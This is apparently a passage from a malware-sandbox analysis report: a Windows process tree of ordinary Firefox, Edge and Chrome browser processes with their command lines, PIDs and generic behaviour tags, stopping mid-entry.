- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1668.2.987451114\347977245" -childID 1 -isForBrowser -prefsHandle 2772 -prefMapHandle 2908 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc20adc7-d833-4266-ac9f-21534324e74b} 1668 "\\.\pipe\gecko-crash-server-pipe.1668" 2888 190a3f97758 tab
    3⤵
    PID:5048
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1668.3.522274720\1618313485" -childID 2 -isForBrowser -prefsHandle 3404 -prefMapHandle 3348 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82d2643d-b6f2-41ba-8256-8f446f1fc68e} 1668 "\\.\pipe\gecko-crash-server-pipe.1668" 3416 190a25b3658 tab
    3⤵
    PID:2584
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1668.4.1028996161\885018017" -childID 3 -isForBrowser -prefsHandle 3808 -prefMapHandle 3816 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {72e45c71-ca73-4143-b197-3938e7d6f19e} 1668 "\\.\pipe\gecko-crash-server-pipe.1668" 4356 190a5cb8558 tab
    3⤵
    PID:1644
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1668.5.1142737139\862975055" -childID 4 -isForBrowser -prefsHandle 4936 -prefMapHandle 4932 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc35e267-e42f-47c9-91d7-1466a057db93} 1668 "\\.\pipe\gecko-crash-server-pipe.1668" 4944 190a5cb7358 tab
    3⤵
    PID:2988
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1668.6.732513107\1742707641" -childID 5 -isForBrowser -prefsHandle 5080 -prefMapHandle 5084 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {236288e3-4ce9-4c30-9b0b-c7d68ef41c6b} 1668 "\\.\pipe\gecko-crash-server-pipe.1668" 5068 190a68aae58 tab
    3⤵
    PID:2628
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1668.7.308608399\1361817124" -childID 6 -isForBrowser -prefsHandle 5284 -prefMapHandle 5288 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b59cba18-25fb-4d80-8790-489eecb3273e} 1668 "\\.\pipe\gecko-crash-server-pipe.1668" 5248 190a68aa258 tab
    3⤵
    PID:1404
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1668.8.899244851\225189734" -childID 7 -isForBrowser -prefsHandle 5620 -prefMapHandle 5624 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c810500-3ae9-40bd-93f1-22ec9de32633} 1668 "\\.\pipe\gecko-crash-server-pipe.1668" 5612 190a7e4e358 tab
    3⤵
    PID:4088

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1120

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2356

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5056

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4384

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2860

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3696

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3288

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1736

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6072

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5352

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5908
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:5892
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5892.0.2096425476\242759257" -parentBuildID 20221007134813 -prefsHandle 1712 -prefMapHandle 1704 -prefsLen 20871 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {81234462-2119-43cf-bc90-155503e3a0d6} 5892 "\\.\pipe\gecko-crash-server-pipe.5892" 1824 23f24305158 gpu
    3⤵
    PID:1568
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5892.1.1347034062\1186349909" -parentBuildID 20221007134813 -prefsHandle 2140 -prefMapHandle 2136 -prefsLen 20952 -prefMapSize 233496 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc97b178-5ba9-440a-a775-903bc37d0dc0} 5892 "\\.\pipe\gecko-crash-server-pipe.5892" 2152 23f18072558 socket
    3⤵
    PID:5696
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5892.2.2114048011\1559560146" -childID 1 -isForBrowser -prefsHandle 2768 -prefMapHandle 2764 -prefsLen 21055 -prefMapSize 233496 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b613e8a4-ab1c-4d35-a765-5f394e9ba18c} 5892 "\\.\pipe\gecko-crash-server-pipe.5892" 2776 23f2732df58 tab
    3⤵
    PID:5320
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5892.3.668121136\1537031103" -childID 2 -isForBrowser -prefsHandle 3332 -prefMapHandle 3328 -prefsLen 26233 -prefMapSize 233496 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3401e29b-e549-48c6-a9fc-8ec2404ec00d} 5892 "\\.\pipe\gecko-crash-server-pipe.5892" 3340 23f18061058 tab
    3⤵
    PID:6128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5892.4.1027385311\349752861" -childID 3 -isForBrowser -prefsHandle 3780 -prefMapHandle 3332 -prefsLen 26233 -prefMapSize 233496 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26c2c419-8ccd-4114-ae20-27143318ed5f} 5892 "\\.\pipe\gecko-crash-server-pipe.5892" 3792 23f27728a58 tab
    3⤵
    PID:656
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5892.5.2088014435\954300984" -childID 4 -isForBrowser -prefsHandle 4460 -prefMapHandle 4360 -prefsLen 26312 -prefMapSize 233496 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {96911b32-f44b-459a-9d7c-71db3b0b6ca1} 5892 "\\.\pipe\gecko-crash-server-pipe.5892" 4444 23f25883e58 tab
    3⤵
    PID:5684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5892.6.1087490998\1811710425" -childID 5 -isForBrowser -prefsHandle 4592 -prefMapHandle 4596 -prefsLen 26312 -prefMapSize 233496 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {72187be6-894f-4a73-82a8-24050a6d778b} 5892 "\\.\pipe\gecko-crash-server-pipe.5892" 4584 23f2922d958 tab
    3⤵
    PID:5688
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5892.7.285298840\1308683725" -childID 6 -isForBrowser -prefsHandle 4864 -prefMapHandle 4860 -prefsLen 26312 -prefMapSize 233496 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d8f5712-1e15-43ef-915d-c0ec9fc26720} 5892 "\\.\pipe\gecko-crash-server-pipe.5892" 4876 23f2922e258 tab
    3⤵
    PID:5712
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5892.8.907208855\405002682" -childID 7 -isForBrowser -prefsHandle 5284 -prefMapHandle 5272 -prefsLen 26312 -prefMapSize 233496 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be5a9efb-1753-4473-b246-358f401a3369} 5892 "\\.\pipe\gecko-crash-server-pipe.5892" 5296 23f2ac1fe58 tab
    3⤵
    PID:6468

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffcaa299758,0x7ffcaa299768,0x7ffcaa299778
  2⤵
  PID:6324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:2
  2⤵
  PID:6768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:8
  2⤵
  PID:6772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:8
  2⤵
  PID:5980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:1
  2⤵
  PID:5500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2888 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:1
  2⤵
  PID:5544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3612 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4840 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:8
  2⤵
  PID:7040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:8
  2⤵
  PID:7008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:8
  2⤵
  PID:7084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:8
  2⤵
  PID:4352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5228 --field-trial-handle=1880,i,7026799872123430545,16343612626282050889,131072 /prefetch:8
  2⤵
  PID:1316

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2332

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x404
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffcaa299758,0x7ffcaa299768,0x7ffcaa299778
  2⤵
  PID:5236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:2
  2⤵
  PID:4480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:8
  2⤵
  PID:3800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2136 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:8
  2⤵
  PID:6608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2888 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:1
  2⤵
  PID:6760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2908 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:1
  2⤵
  PID:6972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4476 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:1
  2⤵
  PID:836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4920 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:8
  2⤵
  PID:944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4936 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:8
  2⤵
  PID:1316
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:6940
- - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff746627688,0x7ff746627698,0x7ff7466276a8
    3⤵
    PID:6824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:8
  2⤵
  PID:6912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4904 --field-trial-handle=1880,i,14607379854368429516,17839706753688850760,131072 /prefetch:1
  2⤵
  PID:5444

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:6928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffcaa299758,0x7ffcaa299768,0x7ffcaa299778
  2⤵
  PID:2096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:2
  2⤵
  PID:6684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:3584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2880 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:5532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2888 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:3900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4448 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:6952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7080
- C:\Program Files\Google\Chrome\Application\chrome.exe
